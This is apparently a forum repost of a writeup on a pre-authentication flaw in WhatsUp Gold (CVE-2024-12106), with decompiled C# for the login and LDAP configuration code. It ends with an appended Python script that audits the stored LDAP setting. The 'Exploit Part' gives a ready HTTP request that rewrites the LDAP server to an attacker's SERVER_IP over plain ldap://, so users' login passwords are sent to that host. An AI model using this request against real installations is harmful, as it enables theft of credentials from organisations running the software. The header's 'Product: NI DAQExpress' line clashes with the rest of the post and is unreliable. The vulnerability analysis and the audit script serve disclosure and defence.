[CVE-2024-12106] - WhatsUp Gold 23.1.1 to 24.01 - Pre-Auth Evil LDAP and Password Theft

  • Thread starter Dark


P.S. This content's original source: https://exploit7.tr/posts/whatsupgold-cve-2024-12106/

Product: NI DAQExpress < 5.1

Severity:
CVSS3 - 7.5

Explanation:
WhatsUpGold is a network monitoring tool developed by Progress. This article is a continuation of the WhatsUpGold Unauth Series.



Authentication Mechanism:


WhatsUpGold has multiple authentication systems, including automatic ones like OpenIdConnect, LDAP, and Active Directory.

When a user starts the login process, the backend checks whether the user is a local user (from the database) or an LDAP/Active Directory user. If the ldap field exists in the GlobalSettings table in the database, the backend sends a request to the server listed there to check whether the user exists. Only if the user is not found there does it fall back to querying the database. This is what happens in the background on every login.


Controllers:

WhatsUpGold has multiple controllers, and most features are handled through the /api/core/ controller.

The Core API controller includes measures such as user session control. The LDAP functionality, however, is exposed through the WUG plugin controller and is handled pre-auth (before any authentication takes place).


LoginAjax:

The login process starts with the LoginAjax action and then moves to the ValidateUser section. ValidateUser is used to identify the user. For example, if the posted username contains the @ symbol, the system will prioritize directing the process to Active Directory.

C#:
public ActionResult LoginAjax(string username, string password, bool rememberMe)
{
    // Decompiled: flag is the license check, flag2 holds the ValidateUser result.
    bool flag = true;
    bool flag2 = false;
    string text = string.Empty;
    LogInViewModel logInViewModel = new LogInViewModel
    {
        Password = password,
        RememberMe = rememberMe,
        UserName = username
    };
    if (flag)
    {
        // User lookup: the LDAP/AD server from GlobalSettings is consulted first, then the local database.
        flag2 = this.loginModel.ValidateUser(logInViewModel);
        if (flag2)
        {
            FormsAuthentication.SetAuthCookie(logInViewModel.UserName, logInViewModel.RememberMe);
            this.userActivityLogger.Log(logInViewModel.UserName, "Authentication", "The user has logged in.");
            this.SessionKeepAlive(logInViewModel.UserName);
            GenericIdentity genericIdentity = new GenericIdentity(logInViewModel.UserName);
            Language usersLanguage = this.lcl.GetUsersLanguage(base.Request.Cookies, base.Request.UserLanguages, genericIdentity);
            this.lcl.SetUsersLanguage(base.Response.Cookies, usersLanguage.LCID);
        }
        else
        {
            if (logInViewModel.ActiveSessionMessage.Contains("Cisco ACS Authentication Failed"))
            {
                this.userActivityLogger.Log(logInViewModel.UserName, "Authentication", logInViewModel.ActiveSessionMessage);
                logInViewModel.ActiveSessionMessage = "Failure at authenticating server.";
            }
            text = logInViewModel.ActiveSessionMessage ?? this.lcl.Lookup("The user name or password provided is incorrect.");
        }
    }
    else
    {
        text = this.lcl.Lookup("Your license is invalid.");
    }
    return base.Json(new
    {
        authenticated = flag2,
        message = text,
        username = logInViewModel.UserName
    }, JsonRequestBehavior.AllowGet);
}


Stack Trace:
C#:
+-- NmUserAuthenticator.Utilities.RegisterLdapAppServices(IUnityContainer) : void @06000009
   +-- NmUserAuthenticator.Utilities.RegisterServices(IUnityContainer) : void @06000014
      +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway(IUnityContainer, IUserAuthenticator) : void @06000026
         +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway(IUnityContainer) : void @06000025
            +-- NmUserAuthenticator.WugUserAuthenticationGateway.WugUserAuthenticationGateway() : void @06000024
               +-- Wug.UIServices.UserService.ValidateUser(ref string, string, out string) : bool @060000F2


LdapController:


On the LDAP Controller, certain post data is expected, including parameters like AdDomain, AuthScheme, LdapDn, Port, Server, and UseTls.

1. If the AuthScheme value is not "ad-domain", AuthDn() returns the LdapDn value. If it is "ad-domain", it takes the AdDomain value and appends %s. This is because Active Directory auth prefixes the domain, for example "EVILDOMAIN%s" (where %s is later replaced by the username from the login post).
2. The UseTls flag, if true, makes FormUri() build a ldaps:// URI. If false, the connection will use plain ldap://.
3. Finally, an XML element built from the user-supplied data is stored in the ldap field of the GlobalSettings table in the database.

C#:
XmlElement xmlElement = new XmlDocument().CreateElement(name);
// AuthDn(): LdapDn, or AdDomain + "%s" when AuthScheme is "ad-domain"
xmlElement.SetAttribute("authorize-dn", this.AuthDn());
xmlElement.SetAttribute("port", this.Port.ToString());
xmlElement.SetAttribute("secured", this.UseTls ? "1" : "0");
xmlElement.SetAttribute("server", this.Server);
// FormUri(): ldaps:// when UseTls is true, otherwise ldap://
xmlElement.SetAttribute("uri", this.FormUri());
xmlElement.SetAttribute("use-ad", (this.AuthScheme == "ad-domain") ? "1" : "0");
return xmlElement.OuterXml;


Exploit Part:
HTTP:
POST /NmConsole/Wug/Ldap/SaveConfig HTTP/1.1
Host: localhost
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=4, i
Content-Length: 91

AdDomain=a&AuthScheme=ad-domain&Port=389&Server=SERVER_IP&UseTls=false&LdapDn=CN=%s
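As an added defensive example (not code from the original writeup or from Progress), the Python audit below parses the ldap element that SaveConfig persists into GlobalSettings, using the attribute names from the C# above, and flags a server outside an allowlist, a cleartext ldap:// URI, and a uri host that disagrees with the allowlist. The trusted host name and the sample element values are assumptions; it covers both the XML-building step and the SaveConfig request shown above.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Assumption: allowlist of the LDAP/AD hosts this WhatsUp Gold install is
# supposed to talk to (hypothetical hostname).
TRUSTED_SERVERS = {"dc01.corp.example"}

# Constructed sample of the element SaveConfig persists, using the attribute
# names from the page; the values are illustrative only.
SAMPLE_LDAP_XML = (
    '<ldap authorize-dn="a%s" port="389" secured="0" '
    'server="SERVER_IP" uri="ldap://SERVER_IP:389" use-ad="1" />'
)


def audit_ldap_config(xml_text, trusted_servers):
    """Return a list of findings for a persisted LDAP config element.

    Findings are raised when the server attribute or the host inside the
    uri attribute is not on the allowlist, or when the bind is unencrypted.
    """
    trusted = {h.lower() for h in trusted_servers}
    el = ET.fromstring(xml_text)
    findings = []

    server = el.get("server", "")
    if server.lower() not in trusted:
        findings.append(f"server attribute points to untrusted host {server!r}")

    uri = el.get("uri", "")
    uri_host = urlsplit(uri).hostname or ""  # urlsplit lowercases the host
    if uri_host not in trusted:
        findings.append(f"uri attribute points to untrusted host {uri_host!r}")

    # secured="0" means FormUri() built a plain ldap:// URI, so the credential
    # presented during login crosses the network to that host without TLS.
    if el.get("secured") != "1" or not uri.lower().startswith("ldaps://"):
        findings.append("bind is cleartext (secured=0 / ldap://)")

    return findings


if __name__ == "__main__":
    for finding in audit_ldap_config(SAMPLE_LDAP_XML, TRUSTED_SERVERS):
        print("FINDING:", finding)
```

Run it against the ldap field read from GlobalSettings after any unexplained change; an empty list means the persisted config matches the allowlist and uses ldaps://.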

